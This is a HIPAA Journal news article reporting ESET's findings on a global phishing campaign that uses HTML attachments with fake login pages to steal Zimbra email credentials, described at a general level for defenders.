The HIPAA Journal is the leading provider of news, updates, and independent advice for HIPAA compliance

Largescale Phishing Campaign Targets Zimbra Collaboration Email Servers

Posted By on Aug 22, 2023

Researchers at ESET have identified a largescale and ongoing phishing campaign targeting Zimbra Collaboration email servers at small- and medium-sized businesses and government agencies. The campaign has been active since at least April and is being conducted globally, with Poland, Ecuador, and Italy the most targeted countries. The campaign does not appear to be targeted on any specific vertical.

Targets are sent an email with an HTML attachment. The email warns the user about an email server update or another Zimbra issue, such as a security update. The From field indicates the email has been sent by an email server administrator. The user is told that they need to download the HTML attachment, which will have a URL pointing to a local file patch. The HTML attachment includes the targeted organization’s logo, the organization’s name, and a fake login page, with the username prefilled. The user is only required to enter their password. If the password is entered, the credentials are transmitted by HTTPS POST request to an adversary-controlled server.

The ESET researchers observed waves of phishing emails being transmitted from some of the organizations targeted in the campaign which suggests the threat actor obtained administrator credentials and was able to set up new mailboxes on the server. The researchers suggest that in these cases, the same password may have been used for email and administration. While this email campaign is not particularly sophisticated, it has proven to be effective. Since the HTML attachments contain legitimate code and only one link pointing to a malicious host, which is contained in the HTML rather than the message body, the emails may not be detected as malicious and are likely to bypass antispam policies, especially since the targeted organizations are mostly small- to medium-sized businesses that are unlikely to have advanced email security defenses. ESET was unable to determine which threat actor is behind the campaign.

Author: Steve Alder is the editor-in-chief of HIPAA Journal. Steve is responsible for editorial policy regarding the topics covered in The HIPAA Journal. He is a specialist on healthcare industry legal and regulatory affairs, and has 10 years of experience writing about HIPAA and other related legal topics. Steve has developed a deep understanding of regulatory issues surrounding the use of information technology in the healthcare industry and has written hundreds of articles on HIPAA-related topics. Steve shapes the editorial policy of The HIPAA Journal, ensuring its comprehensive coverage of critical topics. Steve Alder is considered an authority in the healthcare industry on HIPAA. The HIPAA Journal has evolved into the leading independent authority on HIPAA under Steve’s editorial leadership. Steve manages a team of writers and is responsible for the factual and legal accuracy of all content published on The HIPAA Journal. Steve holds a Bachelor’s of Science degree from the University of Liverpool. You can connect with Steve via LinkedIn or email via stevealder(at)hipaajournal.com

x

Is Your Organization HIPAA Compliant?

Find Out With Our Free HIPAA Compliance Checklist

Get Free Checklist